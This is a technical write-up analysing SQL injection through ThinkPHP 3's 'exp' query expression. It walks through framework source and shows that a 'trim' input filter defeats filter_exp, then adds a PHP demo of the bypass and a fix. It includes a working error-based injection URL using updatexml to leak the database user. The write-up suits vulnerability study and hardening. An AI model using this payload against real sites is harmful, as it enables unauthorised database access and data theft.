I have recently been reading through the framework source code. It is a bit of a headache, but much of it is familiar from earlier review. There is still a lot I have not covered, so I will take it slowly.
There does not seem to be a particularly detailed analysis of this online, so here is my own.
0x01 tp3 exp expression
Query expressions use the following format:
    $map['field name'] = array('expression', 'query condition');
The expression is case-insensitive. The supported query expressions fall into the following categories, with the following meanings:
Here we focus on exp.
The EXP expression accepts raw SQL syntax, so it very easily leads to SQL injection.
    $map['id'] = array('in', '1,3,8');
can be rewritten as:
    $map['id'] = array('exp', ' IN (1,3,8) ');
An exp condition is not treated as a string, so the query part that follows it can use any SQL syntax the database supports, including functions and field names. Query expressions are not limited to queries; they can also be used for data updates, for example:
More complex queries are also supported, for example:
    $User = M("User"); // instantiate the User object
    // modify the data object attributes
    $data['name']  = 'ThinkPHP';
    $data['score'] = array('exp', 'score+1'); // add 1 to the user's score
    $User->where('id=5')->save($data); // save the modified data according to the condition
Query expressions
    $map['field1'] = array('expression', 'query condition 1');
    $map['field2'] = array('expression', 'query condition 2');
    $Model->where($map)->select();
0x02 exp expression injection analysis
The above is a simple demonstration of how exp is used. Because an array can be passed in here, choosing exp mode makes the underlying layer splice the value directly into the SQL statement, which produces an injection:
http://www.qing-tp3.com/index.php/home/index/index2/?id[0]=exp&id[1]==updatexml(0,concat(0x0e,user(),0x0e),0)
Step in with F7 in the debugger.
We arrive at \ThinkPHP\Library\Think\Db\Driver.class.php, line 504:
    foreach ($where as $key => $val) {
        if (is_numeric($key)) {
            $key = '_complex';
        }
        if (0 === strpos($key, '_')) {
            // parse special condition expressions
            $whereStr .= $this->parseThinkWhere($key, $val);
        } else {
            // security filtering of the query field
            // if (!preg_match('/^[A-Z_\|\&\-.a-z0-9\(\)\,]+$/', trim($key))) {
            //     E(L('_EXPRESS_ERROR_').':'.$key);
            // }
            // multiple-condition support
            $multi = is_array($val) && isset($val['_multi']);
            $key   = trim($key);
            if (strpos($key, '|')) { // supports name|title|nickname style query fields
                $array = explode('|', $key);
                $str   = array();
                // ... (remainder of the loop omitted here)
Now let's look at the checks.
The first is parseKey():
    protected function parseKey(&$key) {
        $key = trim($key);
        if (!is_numeric($key) && !preg_match('/[,\'\"\*\(\)`.\s]/', $key)) {
            $key = '`'.$key.'`';
        }
        return $key;
    }
filter_exp:
    function filter_exp(&$value) {
        if (in_array(strtolower($value), array('exp', 'or'))) {
            $value .= ' ';
        }
    }
The key part of the I() function:
    if (isset($input[$name])) { // retrieve the value
        $data = $input[$name];
        is_array($data) && array_walk_recursive($data, 'filter_exp');
        $filters = isset($filter) ? $filter : C('DEFAULT_FILTER');
        if ($filters) {
            if (is_string($filters)) {
                $filters = explode(',', $filters);
            } elseif (is_int($filters)) {
                $filters = array($filters);
            }
            foreach ($filters as $filter) {
                if (function_exists($filter)) {
                    $data = is_array($data) ? array_map_recursive($filter, $data) : $filter($data); // parameter filtering
                } else {
                    $data = filter_var($data, is_int($filter) ? $filter : filter_id($filter));
                    if (false === $data) {
                        return isset($default) ? $default : NULL;
                    }
                }
            }
        }
    } else { // variable default value
        $data = isset($default) ? $default : NULL;
    }
So the only filtering that actually takes effect here is filter_exp, and it runs before the developer's own filters in I(). If the developer writes I('get.id', '', 'trim'), the space appended after exp is stripped straight away again, and the filter becomes ineffective.
Finally, the return:
        } else {
            $whereStr .= $key.' = '.$this->parseValue($val);
        }
        return $whereStr;
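As an added example (not ThinkPHP's own code), the following reduced model of the I() pipeline and the parseWhereItem() operator test shows concretely why a developer-supplied 'trim' filter undoes filter_exp, and one way to harden it. filter_exp() is the framework function quoted above; input_value(), apply_filter_recursive(), input_value_hardened() and selects_exp_branch() are assumed helper names written for this demonstration, and the request array is constructed to match the ?id[0]=exp&id[1]=... shape discussed above.

```php
<?php
// Added example, not ThinkPHP's own code: a reduced model of the I() pipeline
// quoted above. filter_exp() is the framework function from the page; the
// other helpers are assumed names written for this demonstration only.

function filter_exp(&$value) {
    if (in_array(strtolower($value), array('exp', 'or'))) {
        $value .= ' ';
    }
}

// Apply a scalar filter such as 'trim' to every leaf of a nested array
// (stands in for the framework's array_map_recursive()).
function apply_filter_recursive($filter, $data) {
    if (is_array($data)) {
        foreach ($data as $k => $v) {
            $data[$k] = apply_filter_recursive($filter, $v);
        }
        return $data;
    }
    return $filter($data);
}

// Simplified stand-in for I(): $input is the request array (e.g. $_GET),
// $filters is the developer's comma-separated filter list (e.g. 'trim').
// The order is the same as in the framework: filter_exp first, then the
// caller's filters.
function input_value(array $input, $name, $filters = '') {
    if (!isset($input[$name])) {
        return null;
    }
    $data = $input[$name];
    is_array($data) && array_walk_recursive($data, 'filter_exp');
    foreach (array_filter(explode(',', $filters)) as $filter) {
        if (function_exists($filter)) {
            $data = apply_filter_recursive($filter, $data);
        }
    }
    return $data;
}

// Hardened variant (assumed, not from the framework): re-run filter_exp after
// the caller's filters, so a trailing trim cannot remove the marker space.
function input_value_hardened(array $input, $name, $filters = '') {
    $data = input_value($input, $name, $filters);
    if (is_array($data)) {
        array_walk_recursive($data, 'filter_exp');
    }
    return $data;
}

// Mirrors the operator test in parseWhereItem(): the operator word is compared
// after strtolower(), so 'exp ' (with the trailing space) no longer reaches
// the raw-SQL branch, while a bare 'exp' does.
function selects_exp_branch($val) {
    return is_array($val) && isset($val[0]) && is_string($val[0])
        && strtolower($val[0]) === 'exp';
}

// Constructed request, shaped like the ?id[0]=exp&id[1]=... URL above.
$request = array('id' => array('exp', '= 1'));

$cases = array(
    'no caller filter'    => input_value($request, 'id'),
    'caller filter: trim' => input_value($request, 'id', 'trim'),
    'hardened + trim'     => input_value_hardened($request, 'id', 'trim'),
);
foreach ($cases as $label => $val) {
    printf("%-22s id[0]=%s  exp branch reachable: %s\n",
        $label, var_export($val[0], true),
        selects_exp_branch($val) ? 'yes' : 'no');
}
```

Run with `php` on the command line. Without a caller filter, id[0] arrives as 'exp ' and the exp branch is not reachable; with 'trim' as the caller filter the space is removed and the exp branch is reachable again, which is exactly the bypass described above; the hardened variant keeps the marker space regardless of what the developer's filters do. The same idea can be applied inside the framework by moving the filter_exp walk to after the caller's filters rather than before them.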